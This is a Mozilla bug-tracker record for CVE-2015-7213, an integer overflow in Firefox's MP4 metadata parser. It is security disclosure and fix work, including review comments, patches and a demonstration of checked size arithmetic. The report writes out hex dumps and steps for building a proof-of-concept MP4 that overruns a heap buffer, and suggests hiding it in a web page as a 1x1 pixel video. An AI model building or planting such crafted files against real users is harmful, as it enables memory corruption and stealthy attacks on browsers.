Bug 1206211 (CVE-2015-7213): Overflow in MPEG4Extractor::readMetaData causes memory-safety bug
Status: Closed, VERIFIED FIXED (target milestone mozilla44)
Opened 9 years ago, closed 9 years ago
Categories: Core :: Audio/Video: Playback, defect
People: Reporter: q1, Assigned: jya
Keywords: csectype-intoverflow, reporter-external, sec-high
Whiteboard: [adv-main43+][adv-esr38.5+]
Attachments (8 files):
160 bytes, application/octet-stream
3.39 KB, application/octet-stream
96 bytes, application/octet-stream
593.25 KB, application/x-7z-compressed
1.26 KB, patch (ajones: review+; lizzard: approval-mozilla-beta+; abillings: sec-approval+)
1.18 KB, patch (ajones: review+; lizzard: approval-mozilla-beta+)
1.27 KB, patch (mozbugz: review+; Sylvestre: approval-mozilla-esr38+)
1.20 KB, patch (mozbugz: review+; Sylvestre: approval-mozilla-esr38+)
MPEG4Extractor::readMetaData (media\libstagefright\frameworks\av\media\libstagefright\MPEG4Extractor.cpp) will experience an integer overflow with certain MP4 files. This causes the function to allocate an erroneously-small buffer, which it then overruns. The data causing the overrun comes directly from the MP4 file and is, thus, under an attacker's control. This bug currently is exploitable only on x64 versions of FF, but it might be possible to exploit it on x86 versions as well.

Details
-------

The bug is in lines 511-514:

511:   int psshsize = 0;
512:   for (size_t i = 0; i < mPssh.size(); i++) {
513:     psshsize += 20 + mPssh[i].datalen;
514:   }
515:   if (psshsize) {
516:     char *buf = (char*)malloc(psshsize);
517:     char *ptr = buf;
518:     for (size_t i = 0; i < mPssh.size(); i++) {
519:       memcpy(ptr, mPssh[i].uuid, 20); // uuid + length
520:       memcpy(ptr + 20, mPssh[i].data, mPssh[i].datalen);
521:       ptr += (20 + mPssh[i].datalen);
522:     }
523:     mFileMetaData->setData(kKeyPssh, 'pssh', buf, psshsize);
524:     free(buf);
525:   }

which don't check for overflow of |psshsize|. Thus, a file containing pssh boxes totalling > 4GB causes line 513 to overflow. Line 516 then allocates an erroneously-small buffer, which lines 518-522 then overrun with data extracted directly from the MP4 file. This bug is still present in today's trunk: http://hg.mozilla.org/mozilla-central/file/37c7812ce0e6/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp .

The bug is easy to invoke.
Using a binary editor, create poc_header.bin with the following data:

000: 00 00 00 1c 66 74 79 70 6d 70 34 32 00 00 00 00
010: 6d 70 34 32 69 73 6f 6d 61 76 63 31 00 00 00 84
020: 66 72 65 65 00 00 00 00 00 00 00 00 00 00 00 00
030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Then create poc_trailer.bin with this data:

000: 00 00 0d 83 6d 6f 6f 76 00 00 00 6c 6d 76 68 64
010: 00 00 00 00 c7 ca ee a7 c7 ca ee a8 00 01 5f 90
020: 00 07 a5 80 00 01 00 00 01 00 00 00 00 00 00 00
030: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00
040: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00
050: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00
060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
070: 00 00 00 03 00 00 00 18 69 6f 64 73 00 00 00 00
080: 10 80 80 80 07 00 4f ff ff 0f 7f ff 00 00 06 0a
090: 74 72 61 6b 00 00 00 5c 74 6b 68 64 00 00 00 01
0a0: c7 ca ee a7 c7 ca ee a8 00 00 00 01 00 00 00 00
0b0: 00 07 99 50 00 00 00 00 00 00 00 00 00 00 00 00
0c0: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00
0d0: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00
0e0: 00 00 00 00 40 00 00 00 02 30 00 00 01 40 00 00
0f0: 00 00 05 a6 6d 64 69 61 00 00 00 20 6d 64 68 64
100: 00 00 00 00 c7 ca ee a7 c7 ca ee a8 00 01 5f 90
110: 00 07 99 50 55 c4 00 00 00 00 00 21 68 64 6c 72
120: 00 00 00 00 00 00 00 00 76 69 64 65 00 00 00 00
130: 00 00 00 00 00 00 00 00 00 00 00 05 5d 6d 69 6e
140: 66 00 00 00 14 76 6d 68 64 00 00 00 01 00 00 00
150: 00 00 00 00 00 00 00 00 24 64 69 6e 66 00 00 00
160: 1c 64 72 65 66 00 00 00 00 00 00 00 01 00 00 00
170: 0c 75 72 6c 20 00 00 00 01 00 00 05 1d 73 74 62
180: 6c 00 00 00 ab 73 74 73 64 00 00 00 00 00 00 00
190: 01 00 00 00 9b 61 76 63 31 00 00 00 00 00 00 00
1a0: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1b0: 00 02 30 01 40 00 48 00 00 00 48 00 00 00 00 00
1c0: 00 00 01 0e 4a 56 54 2f 41 56 43 20 43 6f 64 69
1d0: 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1e0: 00 00 00 00 18 ff ff 00 00 00 33 61 76 63 43 01
1f0: 42 c0 1e ff e1 00 1b 67 42 c0 1e 9e 21 81 18 53
200: 4d 40 40 40 50 00 00 03 00 10 00 00 03 03 c8 f1
210: 62 ee 01 00 05 68 ce 06 cb 20 00 00 00 12 63 6f
220: 6c 72 6e 63 6c 63 00 01 00 01 00 01 00 00 00 18
230: 73 74 74 73 00 00 00 00 00 00 00 01 00 00 00 a6
240: 00 00 0b b8 00 00 02 ac 73 74 73 7a 00 00 00 00
250: 00 00 00 00 00 00 00 a6 00 00 56 27 00 00 0b 20
260: 00 00 05 bc 00 00 05 e2 00 00 05 c1 00 00 04 37
270: 00 00 04 07 00 00 03 b6 00 00 06 45 00 00 03 73
280: 00 00 05 12 00 00 03 26 00 00 02 e9 00 00 03 7b
290: 00 00 03 4a 00 00 03 6b 00 00 02 b6 00 00 03 4c
2a0: 00 00 02 7a 00 00 02 c7 00 00 02 2e 00 00 03 16
2b0: 00 00 02 26 00 00 02 7f 00 00 01 ec 00 00 01 ea
2c0: 00 00 01 f5 00 00 01 eb 00 00 01 fa 00 00 01 e7
2d0: 00 00 01 fc 00 00 01 dd 00 00 01 c6 00 00 01 ae
2e0: 00 00 01 c8 00 00 01 b9 00 00 01 90 00 00 01 93
2f0: 00 00 01 8c 00 00 01 da 00 00 01 c2 00 00 05 d0
300: 00 00 07 b8 00 00 06 7a 00 00 09 a9 00 00 0a 2c
310: 00 00 0a 7c 00 00 0c b3 00 00 09 8c 00 00 09 52
320: 00 00 0c 04 00 00 0d c1 00 00 0f 74 00 00 10 48
330: 00 00 11 06 00 00 10 61 00 00 0c 63 00 00 0c 31
340: 00 00 0b 42 00 00 0c 0d 00 00 0f 32 00 00 0a 7b
350: 00 00 0d 0f 00 00 0a e0 00 00 0a 0e 00 00 0b 6b
360: 00 00 08 74 00 00 0c 36 00 00 09 e6 00 00 06 8d
370: 00 00 04 f8 00 00 07 8a 00 00 07 c1 00 00 09 f3
380: 00 00 07 c7 00 00 0a cb 00 00 0a d2 00 00 0b 74
390: 00 00 0c 28 00 00 0a 9a 00 00 0c 60 00 00 0d 6d
3a0: 00 00 0c 3e 00 00 0f fc 00 00 0e 82 00 00 0b 79
3b0: 00 00 0d e4 00 00 0d 24 00 00 0a 17 00 00 11 aa
3c0: 00 00 12 65 00 00 0d 7b 00 00 12 a0 00 00 13 d8
3d0: 00 00 11 49 00 00 0e 59 00 00 10 15 00 00 16 81
3e0: 00 00 09 b4 00 00 06 eb 00 00 05 ef 00 00 05 8a
3f0: 00 00 03 d7 00 00 04 0d 00 00 03 bb 00 00 04 6b
400: 00 00 03 40 00 00 03 30 00 00 02 de 00 00 03 ae
410: 00 00 05 cf 00 00 04 6c 00 00 05 69 00 00 05 00
420: 00 00 06 a1 00 00 03 35 00 00 04 1a 00 00 03 fa
430: 00 00 06 3d 00 00 05 d6 00 00 04 68 00 00 02 d6
440: 00 00 04 b5 00 00 02 d9 00 00 02 7f 00 00 02 4d
450: 00 00 02 7d 00 00 03 8c 00 00 02 06 00 00 02 01
460: 00 00 07 7f 00 00 05 ef 00 00 05 b8 00 00 04 0a
470: 00 00 02 99 00 00 03 1d 00 00 07 c5 00 00 05 ac
480: 00 00 04 78 00 00 08 71 00 00 08 99 00 00 08 e9
490: 00 00 08 99 00 00 05 73 00 00 07 c7 00 00 08 3d
4a0: 00 00 0b 59 00 00 0a 36 00 00 06 ba 00 00 05 f9
4b0: 00 00 07 2e 00 00 06 eb 00 00 04 c6 00 00 04 ba
4c0: 00 00 05 66 00 00 04 31 00 00 06 8a 00 00 06 cf
4d0: 00 00 06 fe 00 00 04 97 00 00 02 43 00 00 03 e2
4e0: 00 00 04 06 00 00 02 e6 00 00 02 6b 00 00 02 75
4f0: 00 00 00 28 73 74 73 63 00 00 00 00 00 00 00 02
500: 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 2a
510: 00 00 00 02 00 00 00 01 00 00 00 b8 73 74 63 6f
520: 00 00 00 00 00 00 00 2a 00 00 00 a8 00 00 73 e6
530: 00 00 8b f4 00 00 a4 08 00 00 b7 64 00 00 c8 a5
540: 00 00 d7 d8 00 00 e4 a5 00 00 ec 5f 00 00 f8 5f
550: 00 01 04 41 00 01 1f c3 00 01 51 85 00 01 84 7e
560: 00 01 cc a6 00 02 03 c0 00 02 3c 52 00 02 66 75
570: 00 02 8a 1c 00 02 b4 a6 00 02 e7 66 00 03 23 01
580: 00 03 5d ac 00 03 9e 97 00 03 ea 64 00 04 26 0a
590: 00 04 3e 69 00 04 4c ff 00 04 63 d9 00 04 7e 43
5a0: 00 04 98 9b 00 04 ad a9 00 04 be f7 00 04 d7 94
5b0: 00 04 ed 6c 00 05 0e 3b 00 05 2d c9 00 05 59 f0
5c0: 00 05 7b 82 00 05 95 2b 00 05 b3 da 00 05 c6 67
5d0: 00 00 00 14 73 74 73 73 00 00 00 00 00 00 00 01
5e0: 00 00 00 01 00 00 00 b2 73 64 74 70 00 00 00 00
5f0: 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
600: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
610: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
620: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
630: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
640: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
650: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
660: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
670: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
680: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
690: 44 44 44 44 44 44 00 00 06 7e 74 72 61 6b 00 00
6a0: 00 5c 74 6b 68 64 00 00 00 03 c7 ca ee a7 c7 ca
6b0: ee a8 00 00 00 02 00 00 00 00 00 07 a5 80 00 00
6c0: 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 01
6d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
6f0: 00 00 00 00 00 00 00 00 00 00 00 00 06 04 6d 64
700: 69 61 00 00 00 20 6d 64 68 64 00 00 00 00 c7 ca
710: ee a7 c7 ca ee a8 00 00 bb 80 00 04 14 00 15 c7
720: 00 00 00 00 00 21 68 64 6c 72 00 00 00 00 00 00
730: 00 00 73 6f 75 6e 00 00 00 00 00 00 00 00 00 00
740: 00 00 00 00 00 05 bb 6d 69 6e 66 00 00 00 10 73
750: 6d 68 64 00 00 00 00 00 00 00 00 00 00 00 24 64
760: 69 6e 66 00 00 00 1c 64 72 65 66 00 00 00 00 00
770: 00 00 01 00 00 00 0c 75 72 6c 20 00 00 00 01 00
780: 00 05 7f 73 74 62 6c 00 00 00 67 73 74 73 64 00
790: 00 00 00 00 00 00 01 00 00 00 57 6d 70 34 61 00
7a0: 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00
7b0: 01 00 10 00 00 00 00 bb 80 00 00 00 00 00 33 65
7c0: 73 64 73 00 00 00 00 03 80 80 80 22 00 00 00 04
7d0: 80 80 80 14 40 15 00 01 18 00 01 65 f0 00 01 44
7e0: 6b 05 80 80 80 02 11 88 06 80 80 80 01 02 00 00
7f0: 00 18 73 74 74 73 00 00 00 00 00 00 00 01 00 00
800: 01 05 00 00 04 00 00 00 04 28 73 74 73 7a 00 00
810: 00 00 00 00 00 00 00 00 01 05 00 00 00 f7 00 00
820: 00 db 00 00 00 e1 00 00 00 e5 00 00 00 e9 00 00
830: 00 e8 00 00 00 f0 00 00 00 f1 00 00 00 ef 00 00
840: 00 d8 00 00 00 e6 00 00 00 e7 00 00 00 e9 00 00
850: 00 eb 00 00 00 ea 00 00 00 e8 00 00 00 e1 00 00
860: 00 e7 00 00 00 d7 00 00 00 da 00 00 00 d9 00 00
870: 00 db 00 00 00 e9 00 00 00 ee 00 00 00 e5 00 00
880: 00 e1 00 00 00 e6 00 00 00 e5 00 00 00 d8 00 00
890: 00 dd 00 00 00 dd 00 00 00 d5 00 00 00 ea 00 00
8a0: 00 dd 00 00 00 d0 00 00 00 d6 00 00 00 e9 00 00
8b0: 00 bc 00 00 00 ab 00 00 00 b3 00 00 00 b5 00 00
8c0: 00 bc 00 00 00 ce 00 00 00 b4 00 00 00 b6 00 00
8d0: 00 b3 00 00 00 b6 00 00 00 b7 00 00 00 bf 00 00
8e0: 00 b7 00 00 00 cd 00 00 00 c1 00 00 00 ba 00 00
8f0: 00 a7 00 00 00 b4 00 00 00 b1 00 00 00 be 00 00
900: 00 d0 00 00 00 ba 00 00 00 bc 00 00 00 c4 00 00
910: 00 c6 00 00 00 cb 00 00 00 c4 00 00 00 c3 00 00
920: 00 c8 00 00 00 d2 00 00 00 d2 00 00 00 d6 00 00
930: 00 f5 00 00 00 fa 00 00 00 f6 00 00 01 02 00 00
940: 00 fc 00 00 00 fc 00 00 00 ee 00 00 00 e6 00 00
950: 00 ea 00 00 00 ea 00 00 00 e8 00 00 00 de 00 00
960: 00 df 00 00 00 e7 00 00 00 f6 00 00 00 ff 00 00
970: 01 03 00 00 00 f6 00 00 01 08 00 00 01 03 00 00
980: 00 fd 00 00 01 05 00 00 01 02 00 00 01 00 00 00
990: 01 14 00 00 01 18 00 00 00 fd 00 00 00 fb 00 00
9a0: 01 11 00 00 01 05 00 00 01 05 00 00 01 0a 00 00
9b0: 01 01 00 00 00 f3 00 00 00 f7 00 00 00 f7 00 00
9c0: 01 01 00 00 01 02 00 00 00 f8 00 00 00 f8 00 00
9d0: 00 ef 00 00 00 ed 00 00 00 e3 00 00 00 ec 00 00
9e0: 00 e2 00 00 00 e8 00 00 00 dc 00 00 00 e0 00 00
9f0: 00 f3 00 00 00 df 00 00 00 e1 00 00 00 cf 00 00
a00: 00 ce 00 00 00 d8 00 00 00 ce 00 00 00 c7 00 00
a10: 00 cd 00 00 00 b7 00 00 00 af 00 00 00 c8 00 00
a20: 00 d7 00 00 00 e5 00 00 00 e4 00 00 00 c6 00 00
a30: 00 d1 00 00 00 d5 00 00 00 e5 00 00 00 d8 00 00
a40: 00 c8 00 00 00 be 00 00 00 bf 00 00 00 cb 00 00
a50: 00 d2 00 00 00 c8 00 00 00 ca 00 00 00 b1 00 00
a60: 00 a3 00 00 00 c7 00 00 00 dc 00 00 00 d9 00 00
a70: 00 dd 00 00 00 d1 00 00 00 d2 00 00 00 c2 00 00
a80: 00 bc 00 00 00 b1 00 00 00 9b 00 00 00 89 00 00
a90: 00 a2 00 00 00 9f 00 00 00 b5 00 00 00 a6 00 00
aa0: 00 b2 00 00 00 b5 00 00 00 ae 00 00 00 b4 00 00
ab0: 00 b0 00 00 00 c6 00 00 00 c3 00 00 00 d5 00 00
ac0: 00 e4 00 00 00 f6 00 00 00 d6 00 00 00 db 00 00
ad0: 00 cc 00 00 00 e7 00 00 00 f9 00 00 00 cb 00 00
ae0: 00 d8 00 00 00 d6 00 00 00 e4 00 00 00 f1 00 00
af0: 00 e4 00 00 00 e6 00 00 00 df 00 00 00 ee 00 00
b00: 00 d7 00 00 00 c7 00 00 00 e7 00 00 00 f9 00 00
b10: 00 ed 00 00 00 cf 00 00 00 f1 00 00 00 e6 00 00
b20: 00 dc 00 00 00 e4 00 00 00 ef 00 00 00 e5 00 00
b30: 00 f1 00 00 00 e3 00 00 00 ec 00 00 00 ec 00 00
b40: 00 f3 00 00 00 f5 00 00 00 fd 00 00 01 0b 00 00
b50: 01 10 00 00 01 11 00 00 01 03 00 00 01 01 00 00
b60: 00 fb 00 00 00 fa 00 00 00 e7 00 00 00 e5 00 00
b70: 00 f0 00 00 00 d2 00 00 00 e5 00 00 00 f3 00 00
b80: 00 f1 00 00 00 f2 00 00 00 ff 00 00 00 f7 00 00
b90: 00 ee 00 00 00 d5 00 00 00 d9 00 00 00 ea 00 00
ba0: 00 e3 00 00 00 df 00 00 00 f7 00 00 00 ff 00 00
bb0: 00 f8 00 00 00 fa 00 00 00 fd 00 00 00 f7 00 00
bc0: 00 f9 00 00 00 fb 00 00 00 f8 00 00 00 f6 00 00
bd0: 00 f0 00 00 00 fe 00 00 01 02 00 00 00 e9 00 00
be0: 00 ec 00 00 00 ec 00 00 00 e7 00 00 00 ea 00 00
bf0: 00 de 00 00 00 e2 00 00 00 c9 00 00 00 d4 00 00
c00: 00 d4 00 00 00 c7 00 00 00 c9 00 00 00 c8 00 00
c10: 00 c1 00 00 00 c0 00 00 00 bd 00 00 00 de 00 00
c20: 00 cb 00 00 00 cd 00 00 00 d4 00 00 00 6d 00 00
c30: 00 28 73 74 73 63 00 00 00 00 00 00 00 02 00 00
c40: 00 01 00 00 00 07 00 00 00 01 00 00 00 26 00 00
c50: 00 02 00 00 00 01 00 00 00 a8 73 74 63 6f 00 00
c60: 00 00 00 00 00 26 00 00 6d 8d 00 00 85 9b 00 00
c70: 9d e4 00 00 b1 21 00 00 c2 a7 00 00 d2 8e 00 00
c80: df 8e 00 00 f3 54 00 00 fe e8 00 01 1a 05 00 01
c90: 4a c7 00 01 7e 28 00 01 c5 a1 00 01 fc 89 00 02
ca0: 35 5c 00 02 83 6a 00 02 ae 62 00 02 e1 ae 00 03
cb0: 1d 6d 00 03 58 04 00 03 99 4d 00 03 e4 b1 00 04
cc0: 21 99 00 04 39 67 00 04 5d c6 00 04 78 18 00 04
cd0: 92 6a 00 04 a7 67 00 04 b8 7e 00 04 d0 6c 00 04
ce0: e7 0c 00 05 07 c6 00 05 53 5c 00 05 74 bc 00 05
cf0: 8e 99 00 05 ae 19 00 05 c0 eb 00 05 cb 47 00 00
d00: 00 16 75 64 74 61 00 00 00 0e 6e 61 6d 65 53 74
d10: 65 72 65 6f 00 00 00 6f 75 64 74 61 00 00 00 67
d20: 6d 65 74 61 00 00 00 00 00 00 00 21 68 64 6c 72
d30: 00 00 00 00 00 00 00 00 6d 64 69 72 00 00 00 00
d40: 00 00 00 00 00 00 00 00 00 00 00 00 3a 69 6c 73
d50: 74 00 00 00 32 a9 74 6f 6f 00 00 00 2a 64 61 74
d60: 61 00 00 00 01 00 00 00 00 62 6c 61 68 62 6c 61
d70: 68 62 20 30 2e 39 2e 34 20 32 32 32 32 31 31 32
d80: 33 30 30 00 00 00 08 66 72 65 65

Then create poc_body.bin with these contents:

000: 01 00 00 00 70 73 73 68 00 00 00 04 ee ee ee ee
010: ee ee ee ee ee ee ee ee ee ee ee ee 00 00 00 00
020: 50 75 74 20 79 6f 75 72 20 61 74 74 61 63 6b 20
030: 63 6f 64 65 20 61 6e 64 20 64 61 74 61 20 68 65
040: 72 65 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e
050: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d

Set the length of poc_body.bin to 0x01000000. It doesn't matter what bytes 0x20-0xffffff contain. Next, repeatedly double poc_body.bin until it's exactly 0x100000000 bytes long (4GB). Then copy poc_header.bin+poc_body.bin+poc_trailer.bin into poc_test.mp4. Start FF Win64 and attach a debugger, setting a BP on line 511. Load poc_test.mp4 and wait for the BP to fire, then step the code to see the overflow and subsequent overrun.
The file takes ~30 sec to load. It could be embedded into an attack page as a 1x1 pixel video so users wouldn't notice it loading.
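The size arithmetic described in comment 0, with the check-and-bail approach the later approval comments describe ("only added checks with parsing bailouts", "limiting size to 2GiB"), as an added example written for this page; it is not code from the Mozilla or stagefright tree. The PsshInfo layout, the function names, the 2 GiB cap value and the three sets of records are assumptions constructed for the demonstration.

```cpp
// Added example for this page, not code from the Mozilla or stagefright tree.
// It models the psshsize accumulation quoted in comment 0 on constructed
// PsshInfo records and places an overflow-checked version of the same loop
// beside it. Struct layout, names and the 2 GiB cap are assumptions.
#include <cstdint>
#include <cstdio>
#include <initializer_list>
#include <vector>

// Assumed shape of a parsed pssh record; only the declared length matters here.
// The real struct also carries a pointer to the box payload.
struct PsshInfo {
    uint8_t  uuid[20];   // 16-byte system id followed by the 4-byte length field
    uint32_t datalen;    // payload length as declared in the file
};

// Bytes copied per record ahead of the payload (the "uuid + length" memcpy).
constexpr uint32_t kPsshHeaderBytes = 20;

// Lines 511-514 as quoted in the bug: a 32-bit total with no overflow check.
// The accumulator is uint32_t here so the wraparound is well defined in this
// example; the returned value is the size the original then hands to malloc().
// A total that wraps to a small nonzero value leads to an undersized buffer;
// a total that wraps to exactly 0 makes the original's `if (psshsize)` skip
// the block, so that guard is not a size check.
uint32_t UncheckedPsshSize(const std::vector<PsshInfo>& pssh) {
    uint32_t psshsize = 0;
    for (size_t i = 0; i < pssh.size(); i++) {
        psshsize += kPsshHeaderBytes + pssh[i].datalen;   // wraps modulo 2^32
    }
    return psshsize;
}

// Hardened loop: accumulate in 64 bits and bail out before any allocation as
// soon as the running total would exceed a fixed cap. Comment 15 says the fix
// applies a 2 GiB limit elsewhere; the same value is assumed here.
constexpr uint64_t kMaxPsshBytes = 2ULL * 1024 * 1024 * 1024;

bool CheckedPsshSize(const std::vector<PsshInfo>& pssh, uint64_t* out) {
    uint64_t total = 0;
    for (const PsshInfo& p : pssh) {
        // 20 + datalen is at most 2^32 + 19, so this sum cannot overflow in 64 bits.
        uint64_t entry = uint64_t{kPsshHeaderBytes} + p.datalen;
        if (entry > kMaxPsshBytes - total) {
            return false;   // malformed: declared sizes exceed the cap, parsing bails out
        }
        total += entry;
    }
    *out = total;
    return true;
}

// Builds constructed records with the given declared lengths (no payload).
std::vector<PsshInfo> MakeRecords(std::initializer_list<uint32_t> lens) {
    std::vector<PsshInfo> v;
    for (uint32_t len : lens) {
        PsshInfo p = {};
        p.datalen = len;
        v.push_back(p);
    }
    return v;
}

// 256 constructed records of 16 MiB each: the declared sizes sum to exactly
// 2^32, the shape of the 4 GB body the report describes.
std::vector<PsshInfo> MakeFourGigabyteRecords() {
    std::vector<PsshInfo> v(256);
    for (PsshInfo& p : v) {
        p.datalen = 0x01000000u - kPsshHeaderBytes;
    }
    return v;
}

static void Report(const char* label, const std::vector<PsshInfo>& pssh) {
    uint64_t total = 0;
    bool ok = CheckedPsshSize(pssh, &total);
    std::printf("%-22s unchecked=%u  checked=%s", label,
                static_cast<unsigned>(UncheckedPsshSize(pssh)), ok ? "accept" : "reject");
    if (ok) std::printf(" (%llu bytes)", static_cast<unsigned long long>(total));
    std::printf("\n");
}

int main() {
    Report("benign (100+200)", MakeRecords({100, 200}));                  // 340 / accept
    Report("two 2 GiB records", MakeRecords({0x7FFFFFF0u, 0x7FFFFFF0u})); // wraps to 8 / reject
    Report("256 x 16 MiB records", MakeFourGigabyteRecords());             // wraps to 0 / reject
    return 0;
}
```

The checked variant never computes a value that could overflow: the per-record size is widened to 64 bits before it is added, and the comparison is written as `entry > cap - total` so the subtraction itself cannot underflow. Rejecting before `malloc` is what keeps the later `memcpy` loop from ever running against a buffer sized from a wrapped total.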
Updated•9 years ago
Flags: needinfo?(jyavenard)
Updated•9 years ago
Keywords: csectype-intoverflow
Comment 2•9 years ago
Could you please attach the test file to make it easier to confirm? Thanks.
Flags: needinfo?(q1)
(In reply to Andrew McCreight [:mccr8] from comment #2)
> Could you please attach the test file to make it easier to confirm? Thanks.

OK. You'll need to edit the poc_body.bin file, extend it, and so forth as described at the end of comment 0. Otherwise it'd be too large to upload. I'll upload the binary files momentarily.
Flags: needinfo?(q1)
Attachment #8664340 -
Attachment filename: poc_lsf_trailer_1.bin → poc_trailer.bin
Attachment #8664336 -
Attachment filename: poc_lsf_hdr_1.bin → poc_header.bin
Attachment #8664342 -
Attachment filename: poc_lsf_pssh_2.bin → poc_body.bin
Comment 8•9 years ago
(In reply to q1 from comment #3)
> (In reply to Andrew McCreight [:mccr8] from comment #2)
> > Could you please attach the test file to make it easier to confirm? Thanks.
>
> OK. You'll need to edit the poc_body.bin file, extend it, and so forth as
> described at the end of comment 0. Otherwise it'd be too large to upload.
> I'll upload the binary files momentarily.

The described test case should compress very well with say xz or lzma if that body is just the same repeated byte. Can you please attach a ready to run test that has been compressed? Thanks.
Comment 10•9 years ago
(In reply to q1 from comment #9)
> Created attachment 8664449 [details]
> poc.7z -- unzip with 7z into ready-to-use POC

Thanks! I tried to reproduce the issue but hit another I came across while fuzzing a couple weeks ago. I have logged the other issue. In the meantime any back traces or ASan logs that you managed to capture would also be nice to have.
Reporter
Comment 11•9 years ago
(In reply to Tyson Smith [:tsmith] from comment #10)
> (In reply to q1 from comment #9)
> > Created attachment 8664449 [details]
> > poc.7z -- unzip with 7z into ready-to-use POC
>
> Thanks! I tried to reproduce the issue but hit another I came across while
> fuzzing a couple weeks ago. I have log the other issue. In the mean time any
> back traces or ASan logs that you managed to capture would also be nice to
> have.

I found this via code inspection, then formulated the POC. I have tested it under FF 40.0 debug Win64, which is my build with a few trivial unrelated mods. It also crashes 40.0b8 Win64 downloaded directly from ftp.mozilla.org, and if you examine it in the debugger, the crash was clearly caused by memory getting overwritten with the POC's test pattern.
Updated•9 years ago
Flags: sec-bounty?
Assignee
Updated•9 years ago
Flags: needinfo?(jyavenard)
Assignee
Comment 12•9 years ago
git bz lost my comment; will provide it again later.
Attachment #8665247 -
Flags: review?(ajones)
Assignee
Comment 13•9 years ago
Attachment #8665248 -
Flags: review?(ajones)
Assignee
Comment 14•9 years ago
So what I was saying (though will do in a shorter version):

While I could see how we could think it would happen theoretically, it can no longer happen following bug 1196398 (which is in 41 onward). We only ever parse the ftyp and moov atoms; anything in between is ignored. And as such, with this POC.mp4 you'll find that mPssh is an empty array.

We no longer support encrypted MP4 outside fragmented mp4 and MSE; as such we don't attempt to parse pssh atoms; we use the MoofParser for this, which doesn't have this vulnerability.

Now you could attempt to craft an mp4 where those pssh would be within the moov atom; but for this to work, you would need the moov atom to have a size > 2GB, which isn't possible and would cause a decoding error.

We could make the moov atom the last atom and make it with a size of 0 (which normally means: read to the end). However, stagefright doesn't support those and will also return an error, as it will error if the atom size is below 8.

As such, this vulnerability doesn't apply in 41 and later.
Updated•9 years ago
Attachment #8665247 -
Flags: review?(ajones) → review+
Updated•9 years ago
Attachment #8665248 -
Flags: review?(ajones) → review+
Assignee
Comment 15•9 years ago
Comment on attachment 8665247 [details] [diff] [review]
P1. Ensure operation can't overflow.

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
I don't believe they can in 41 and later with this POC.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
It's fairly generic; do mention.

Which older supported branches are affected by this flaw?
40 and earlier. esr38 is affected.

If not all supported branches, which bug introduced the flaw?
The stagefright one, over 1.5 years ago.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
Patch should apply on 38.

How likely is this patch to cause regressions; how much testing does it need?
None; we've applied the same logic elsewhere (limiting size to 2GiB).
Attachment #8665247 -
Flags: sec-approval?
Assignee
Updated•9 years ago
Assignee: nobody → jyavenard
Assignee
Comment 16•9 years ago
!@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one was in it, and it got pushed :(

https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4
https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5

:(
Comment 17•9 years ago
(In reply to Jean-Yves Avenard [:jya] from comment #16)
> !@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one
> was in it, and it got pushed :(
>
> https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4
> https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5
>
> :(

Per talking to dveditz on irc, we let this check-in stay and are so far not backing this out.
Reporter
Comment 18•9 years ago
(In reply to Jean-Yves Avenard [:jya] from comment #14)
> So what I was saying (though will do in a shorter version)
>
> While I could see how we could think it would happen theoretically, it can
> no longer happen following bug 1196398 (which is in 41 onward).
> We only ever parse the ftyp and moov atoms ; anything in between is ignored.
> And as such, with this POC.mp4 you'll find that mPssh is an empty array.
>
> We no longer support encrypted MP4 outside fragmented mp4 and MSE ; as such
> we don't attempt to parse pssh atoms ; we use the MoofParser for this which
> doesn't have this vulnerability.
>
> Now you could attempt to craft a mp4 where those pssh would be within the
> moov atom; but for this to work, you would need the moov atom to have a size
> > 2GB which isn't possible and would cause a decoding error.
>
> We could make the moov atom the last atom and make it with a size of 0
> (which normally means: read to the end). However, stagefright doesn't
> support those and will return also an error as it will error if the atom
> size is below 8.
>
> As such, this vulnerability doesn't apply in 41 and later.

That's the conclusion I came to after trying the POC on 41 yesterday.
Comment 19•9 years ago
